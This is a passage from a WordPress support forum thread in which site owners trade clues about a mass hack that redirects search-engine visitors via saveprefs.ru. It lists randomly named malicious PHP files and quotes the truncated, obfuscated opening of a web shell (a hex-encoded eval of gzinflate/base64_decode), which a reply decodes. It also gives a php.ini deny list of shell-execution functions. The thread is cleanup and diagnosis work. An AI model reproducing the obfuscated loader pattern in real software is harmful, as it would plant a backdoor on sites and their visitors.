3.3.1 Hacked by saveprefs.ru redirect

  • Hi everyone, I have just been hacked. I am a web developer, and have about 20-30 WordPress sites, all of them running 3.3.1. They all seem to have been hacked. Here’s one you can look at, if you search google for harmonyhomes.net and click on the link from Google, you will see that it goes to https://saveprefs.ru/astro/index.php first then to msn.ca. Can anyone please help me find the code? I really don’t want to have to try to restore all my sites from backups.

    Thank you all.

    Jamie

Viewing 15 replies - 16 through 30 (of 98 total)
  • Thread Starter Jamie Edwards

    (@jamieedwards)

    Ok, awesome, thanks impackt, I just noticed that I missed something way down at the bottom of the .htaccess file that was giving a 404 error. I have cleaned out everything that I can find that is obvious in the .htaccess file. I have changed my FTP and my cPanel passwords too.

    I have looked through every folder looking for any unusually named files, but can’t find any. I will keep looking.

    Thanks so much for registering here to help, I appreciate it lots.

    Thread Starter Jamie Edwards

    (@jamieedwards)

    Also, thanks Mickey, i have set the permissions to 444, we’ll see if that stops the files from being overwritten ever 30 minutes or so…

    You’re welcome!

    I wish I could tell you what the file name was, but I deleted it the second that I noticed it — it was mostly composed of random numbers.

    I’ll post in a few hours to let you know if my site is still clean

    Thread Starter Jamie Edwards

    (@jamieedwards)

    I saw another post somewhere else tonight that mentioned the same thing. I however haven’t seen anything of the sorts, also, i would imagine it would have a similar last modified date as the new corrupted .htaccess file (today’s date). The other post said to look for something with a name of something like ws2043124.php or something like that. I will keep looking ??

    Hello together,

    same issues on my site! I found these post quite useful: https://www.google.com/support/forum/p/Webmasters/thread?tid=7b5bc4f20bf9b3f3&hl=en

    I looked for similar php-files and found a lot, e. g.:

    -rw-r–r– 1 www-data www-data 23289 10. Jan 00:34 w21301478n.php
    -rw-r–r– 1 www-data www-data 23289 9. Jan 17:14 w37504127n.php
    -rw-r–r– 1 www-data www-data 23289 9. Jan 21:46 w50631636n.php
    -rw-r–r– 1 www-data www-data 23289 10. Jan 00:25 w69768580n.php
    -rw-r–r– 1 www-data www-data 23289 16. Jan 11:44 w11756090n.php
    -rw-r–r– 1 www-data www-data 23289 9. Jan 21:46 w12586317n.php
    -rw-r–r– 1 www-data www-data 23289 16. Jan 11:46 w15008865n.php
    -rw-r–r– 1 www-data www-data 23289 16. Jan 11:25 w17778828n.php
    -rw-r–r– 1 www-data www-data 23289 16. Jan 11:46 w25746672n.php
    -rw-r–r– 1 www-data www-data 23289 16. Jan 12:03 w25862560n.php
    -rw-r–r– 1 www-data www-data 23289 16. Jan 11:36 w40138369n.php

    and much more.

    Unfortunately, I couldn’t understand the content. It starts with:

    <?php $auth_pass=””;$color=”#df5″;$default_action=”FilesMan”;$default_use_ajax=true;$default_charset=”Windows-1251″;preg_replace(“/.*/e”,”\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28’7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJk …

    If anybody could or is interested in such a file for diagnostics I could send by email.

    What I have done now is:

    – Checking for unknown system users (wasn’t any)
    – Changing all system passwords (root and users)
    – Changing mysql root password
    – Changing all mysql user passwords

    I realized, that every some minutes, the .htaccess-files will be updated. My plan now is:

    – to identify all w??????????n.php-files and delete them (all are under Apache DocumentRoot).
    – to delete unnecessary .htaccess-files or delete unwanted content in these .htaccess-files.
    – check, if the update of .htaccess-files will continue or is stopped.

    Keep fingers cross, that this will help!

    Funny thing that php-ids.org is hacked too.

    code that you are posted is decoded to :

    eval(gzinflate(base64_decode(‘7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJk …

    which is mean: execute some shit that ziped in base64.

    P.S.
    @p-mt, could you please upload one of malicious file from your system to pastebin.com and post link here. It seems like mass attack, so we need to know what to expect.

    Hi there, i got the same issues here.. >>>,<
    Have tried most of the things that been talked here.
    but until now still get played by this damn crap hacker….

    :(((

    Hi Old_fart,

    here you can find content of “w11756090n.php”: w11756090n.php

    Thanks, I will take a look on it, but you all who got this shit need to do following steps:

    1. locate your php.ini file
    2. replace there
    disable_functions =
    to
    disable_functions = “apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode”
    3. force to restart http server

    do you think, wordpress will work after that??

    no search results found from searching the “w11756090n.php” here..
    instead i found a suspicious file in my /wp-content/themename/temp folder. . the file named: 303ca5097ae43fd8583179bae0b9aed8.php

    Hi old-fard, yea i have the same question..

    My site is still clean and passing the test( https://sitecheck.sucuri.net/scanner/ ) since I fixed it 6 hours ago.

    Has anyone else had any luck with my method?

    just know all my .htaccess get shitted again with this crap.. ??
    i couldn’t find any suspicious file more..

    hi impackt, I am sorry.. I still couldn’t understand how to do your method.. All I know that all the .htaccess files will always be edited by this shit.. Can you explained it in more detail? I’d really love to try..
    Thanks before..

    @p-mt wrote “do you think, wordpress will work after that??”

    Mine is working. There could be some plugins that use those functions, but all of them should be avoided. You may search for that functions through all wordpress’s php files, but legal application rarely use that funcs.

    @richardlin File names generated by virus is unique cuz it made with help of random generator.

    @impackt As I can see from virus code – it reply with redirected link to search engines bots ONLY and obviously will not discover itself to well known scanner. sitecheck.sucuri.net can check only produced by PHP code output, but it can’t examine your file system. You can download to Firefox plugin “User agent switcher” and check your site with user agent set to “Google” or “Slurp” or “MSNBot” or “ia_archiver” or “Yandex” or “Rambler”

    I got this problem too.
    As for a temporary solution:
    -delete the infected .htaccess file.
    -create another .htaccess file that wordpress uses for permalinks.
    -change CHMOD of this file to 444 so no one can edit it even a shitty script!

Viewing 15 replies - 16 through 30 (of 98 total)
  • The topic ‘3.3.1 Hacked by saveprefs.ru redirect’ is closed to new replies.